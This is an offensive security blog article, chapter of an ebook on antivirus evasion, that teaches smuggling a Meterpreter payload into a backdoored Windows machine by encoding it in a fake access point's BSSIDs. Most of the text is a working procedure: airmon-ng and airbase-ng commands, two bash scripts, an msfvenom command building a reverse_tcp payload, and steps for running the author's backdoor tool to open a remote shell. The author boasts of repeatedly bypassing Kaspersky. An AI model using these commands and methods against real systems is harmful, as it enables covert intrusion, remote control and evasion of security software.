Transferring Backdoor Payloads with BSSID by Wireless Traffic
Transferring Backdoor Payloads with BSSID by Wireless Traffic
Note: This Article Published (March 5, 2017).
in this article I want to talk about Wireless Access Point and BSSID (MAC-Address AP).
We talked about ARP traffic in IPv4 now we should talk about something like that in Wireless Traffic so this technique is something like ARP Technique in my last Article .
So again we have Backdoor Payload without File-system encryption and without hardcoded Payload in File-system (only in memory) so again you can bypass all Anti-viruses by this method also we have Meterpreter Payload Transferring without Payloads Encryption in Network Traffic in this case Wireless Traffic.
In this case an attacker can perform this attack with Changing BSSID like (Loop changing) for fake AP , it means you can do this just by changing BSSID and Injecting your Backdoor Payload step by step to BSSID (MAC-Address for fake AP) and in client side Infected system (backdoor system) can Dump these Payload steps by Scanning Access Points MAC-Address (BSSID) on AIR without connecting to Fake AP by user-pass so Transferring Payloads happened by Wifi Devices for example wlan (Wireless Traffic) also in my scenario Meterpreter Session established by Ethernet Network (without Wifi/wireless Device) After dump the Payloads by scanning BSSID on AIR.
So you will see malware code or in this case Simple Backdoor code can use your WIFI Devices for Transferring/Dumping Payloads silently in this case Wlan and finally you have meterpreter session with Simple C# code .
In my scenario I used Wifi Device just for Transferring Payloads (Step 1) and dump these Payloads by scanning Wifi Device MAC-Address (BSSID) then my backdoor will make Meterpreter Session by eth0 or Ethernet Card for Establishing Meterpreter Session so in this phase (step 2) we use Network Traffic without WIFI device for establishing Meterpreter Session .
Note : I think technically it possible if you want to do these (Step 1 and Step 2) by WIFI device only, I am not sure because this one not tested by me but I think it is possible , I think you need Something like EvilTwin AP for (Step 2) also you should make Meterpreter Listener with one IP-Address in Fake Access Point Network Subnet and …..
Note: you can use MANA-Toolkit or something like that for do this. link : https://github.com/sensepost/mana
What is Important Points for this method ?
important points is : malware or backdoor Payload injection to BSSID for Wifi Device and Transferring by Wireless Traffic is possible.
Scanning injected Payloads to BSSIDs from Fake AP , Step by step :
for example we have this Payload for transferring :
“fec8b00011ddc00945f1”
step 1: attacker system make one Fake Access-Point with name “Fake” and Mac-Address is 00:fe:c8:b0:00:11
- note : Mac-Address 00:fe:c8:b0:00:11 is our Injected Payload so our payload is “fec8b00011”
- this section of payload “fec8b00011ddc00945f1”
step 2: backdoor system Scanning Essid “Fake” and dumping BSSID for that
- note : your backdoor code should dump these section of BSSID or Mac-Address fe:c8:b0:00:11 ==> fec8b00011
step 3: attacker system make one Fake Access-Point with name “Fake” and Mac-Address 00:dd:c0:09:45:f1
- note: Mac-Address 00:dd:c0:09:45:f1 is our Injected Payload so our payload is “ddc00945f1”
- this section of payload “fec8b00011ddc00945f1”
step 4: backdoor system Scanning Essid “Fake” and dumping BSSID for that
- note : your backdoor code should dump these section of BSSID or Mac-Address dd:c0:09:45:f1 ==> ddc00945f1
after these 2 step for scanning you will have this payload fec8b00011ddc00945f1 in infected system (backdoor system)
now you can understand how this method worked so let me show you more information for these (step 1 and step 3) by Commands in the linux side. (time to make Fake AP by commands)
Optional commands : Changing TXPower for Wifi card before making Wlan0mon , these commands can help you for making better Fake AP signal so you can use this command manually if you want it.
ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 txpower 30- Note : these commands before making Wlan0Mon by airmon-ng should be used also these commands is optional ( not required )
making Monitor Mode for WLAN Card is important step for making Fake AP :
with this command “airmon-ng start wlan0” you can make “Wlan0Mon” (monitor mode) for your Wlan0.
Note : you can run this command manually just one time or you can use this command in script1.sh file one time like step (cmd 1–1). but in this case I used that manually in attacker side .
step 1: attacker system make one Fake Access-Point with name “Fake” and Mac-Address 00:fe:c8:b0:00:11
- note : Mac-Address 00:fe:c8:b0:00:11 is our Injected Payload so our payload is “fec8b00011”
cmd 1–1: airmon-ng start wlan0
- note : making Wlan0Mon (monitor mode)
cmd 1–2: airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon
- note : you need make this Fake AP for 15 sec so you can kill this command in (cmd 1–2) after 15 sec by killall command
cmd 1–3: sleep 15
cmd 1–4: killall airbase-ng
step 3: attacker system make one Fake Access-Point with name “Fake” and Mac-Address 00:dd:c0:09:45:f1
- note : Mac-Address 00:dd:c0:09:45:f1 is our Injected Payload so our payload is “ddc00945f1”
cmd 3–1: airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon
- note : you need make this Fake AP for 15 sec so you can kill this command in (cmd 3–1) after 15 sec by killall command
cmd 3–2: sleep 15
cmd 3–3: killall airbase-ng
as you can see in these steps we should use these commands , but we have big problem with airbase-ng or maybe I had big problem with this nice command (airbase-ng)
where is problem ?
Problem started from step (cmd 1–2) up to (cmd 1–3)
after step (cmd 1–2) you can’t stop this airbase-ng command , just with ctrl+c or Killing this Command you can stop it … so my bash script always stop in step: (cmd 1–2) until i kill this process one time.
so for resolve this problem my solution is using 2 bash script file for these steps :
- First bash script file is “Script1.sh” for these steps (cmd 1–2 and cmd 3–1)
note : you can add step (cmd 1–1) one time in first line of this bash script or do that manually one time. In this case I performed (cmd 1–1) manually one time .
- Second bash script is “Script2.sh” for these steps (cmd 1–3 & cmd 1–4 & cmd 3–2 & cmd 3–3)
so in this scenario we should first run bash script “Script1.sh” then immediately or after 2–3 sec we should run bash script “Script2.sh”.
So we have something like these files
Script1.sh file :
#!/bin/bash
airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon ;
airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon ;Script2.sh file:
#!/bin/bash
sleep 15 ;
killall airbase-ng ;
sleep 15 ;
killall airbase-ng ;- Note: you can use loop commands like ( for ) in bash script “Script2.sh” file .
As you can see in Picture A we have script1.sh file for injecting Meterpreter Payloads to BSSIDs.
as you can see in picture A , from line 3 our Meterpreter Payload was started. In this case my Meterpreter Payload was 510 bytes
in this case with airbase-ng command you can injecting 5 bytes of payload to BSSID for our Fake Access with name “Fake”.
so we should have 102 lines for Injecting all payload by airbase-ng command to BSSID.
102 * 5 = 510 bytes
Note : each BSSID contains 5 bytes of payload.
BSSID = 00:fc:48:83:e4:f0 {5 bytes} ==> fc-48-83-e4-f0
In this case two BSSID Mac-Address should be added to this script1.sh file
as you can see in Picture A , my Script had in line 2 this MAC-Address 00:ff:ff:ff:ff:ff , this Mac-Address or BSSID is flag for starting Attack and Transferring Traffic to Infected system also you can see in picture B this file should be finished by this BSSID {00:ff:00:ff:00:ff}
BSSID Flag for Start = 00:ff:ff:ff:ff:ff
BSSID Flag for Finish = 00:ff:00:ff:00:ffBSSID Injection Loop : changing BSSID (102 + 2) = 104 Times .
also you can see second script script2.sh file like Picture C , in this file you can use Loop command like (For) or you can make something like this Picture .
in this file “script2.sh” you should killing airbase-ng for 104 times at least .
now I want to explain this method step by step by my Tool ( NativePayload_BSSID.exe ) :
Step by Step :
step 0 : making Wlan0mon (Monitor mode) .
syntax : airmon-ng start wlan0
step 1 : you should make one payload for your backdoor with this command :
msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp
lhost=192.168.1.50 -f c > payload.txtstep 2 : in this step you should replace your payload from this format “\xfc\x48\x83\xe4” to “fc4883e4” in payload.txt file.
you can use switch “help” for this tool for showing all syntax , like Picture 1:
now you should copy your Payload string and paste that by switch NULL for NativePayload_BSSID , like Picture 1–1:
syntax : c:\> NativePayload.exe null “fc4883e4...”
now you should copy all these line to one bash script for example “script1.sh” file
- Note : copy and paste only airbase-ng command lines to script1.sh file
in this case these lines should be 102 lines + 2 = 104 lines
like picture A you should add manually this “#!/bin/bash” in first line of script so now you should have 105 lines in this file.
step 3: in this step you should run this Script1.sh in Linux side . Don’t worry its ok !.
Change chmod and run this script like picture 2:
step 4: in this step you should make script2.sh and change chmod for this script but not needed to run this script in this (step4) like picture 3.
- Note: you should make this bash script manually like Picture C.
step 5: in this step you should run your Backdoor in this case NativePayload_BSSID.exe tool , as you can see in Picture 4 , I made Meterpreter Listener in kali linux for IPAddress 192–168–1–50 and “script1.sh” executed.
So we have these Steps in step 5
Step AA : Meterpreter Listener executed (linux)Step BB : script1.sh should be run (linux)Step CC : Backdoor “NativePayload_BSSID.exe” should be run (Windows)Step DD : script2.sh should be run (linux)
Step CC : in this time you should execute this Backdoor NativePayload_BSSID with this syntax like picture 4
NativePayload_BSSID.exe “essid”in this case our ESSID in script1.sh is “Fake” so correct syntax is :
c:\> NativePayload_BSSID.exe “Fake”as you can see in picture 4 , these steps performed (AA , BB and CC)
as you can see in Picture 4 , Backdoor executed by user “u1” in this case then you should run “script2.sh” (step DD) like picture 4.
in this time Backdoor Code try to Scanning ESSID “Fake” on AIR then dump BSSID for “Fake” Access Point so as you can see in Picture 4 my code Dumped 4 times this BSSID “00:ff:ff:ff:ff:ff” , this BSSID is flag for Starting Attack and Transferring Payloads by BSSID .
So on AIR we have something like these steps:
Now time to Running script2.sh (Step DD)
after run this Script2.sh for each 15 Sec this script will kill one Airbase-ng Command from your Script1.sh file.
so on AIR in this step after run this Script2.sh we have something like these steps :
as you can see in Picture 5 my Backdoor try to Dumping BSSIDs after Running “script2.sh” file
as you can see in picture 6 you will have meterpreter session after 30 minutes .
as you can see we have Established Meterpreter Session by my C# code and my Kaspersky 2017 Anti-virus bypassed by this method again and again and again , finally meterpreter Session Established.
Note : in picture 7 you can see my code Made Establish Meterpreter session Connection after 15 sec delay , this delay was for my code so if you check this method by my code after dumping all payloads you should waiting 15 sec then you will have Meterpreter Session , I hope ;)
at a glance : your Wireless Devices are vulnerable always so you should thinking about these threats:
1.malware or backdoor Payload injection to BSSID for Wifi Device and Transferring by Wireless Traffic is possible.
2.if you want to use WIFI device for your Clients and your Network infrastructure you should thinking about these threats
3. in this method your infected system always is vulnerable until your Wifi Card is on and maybe one day your clients attacked with Wifi card by attacker Cell phones and Fake AP …..
4.in this case my Backdoor try to scan ESSIDs for example “Fake” for dumping BSSID so this traffic will work very slowly and quietly too.
5.your Anti-viruses can’t detect this one and your firewall in LAN/WAN bypassed because we had not any traffic via these infrastructures , in this case we have direct Traffic between Infected system Wifi Card and Attacker system Wifi Card on AIR also after payload dumped by backdoor we will have Reverse_tcp Meterpreter session traffic from Infected system to Attacker system by LAN/WAN without Wifi-Card so in this case again we have outgoing traffic from Backdoor system to attacker system in Internet or LAN and this traffic the most time will not block by windows firewall or ….
Note: This Article was “Chapter 9”, eBook “Bypassing Anti-Viruses by C# Programming”
Github Download pdf & code, “Chapter 9” :
https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH9
C# source code : https://github.com/DamonMohammadbagher/NativePayload_BSSID
Video : https://youtu.be/W0dJGln3tls
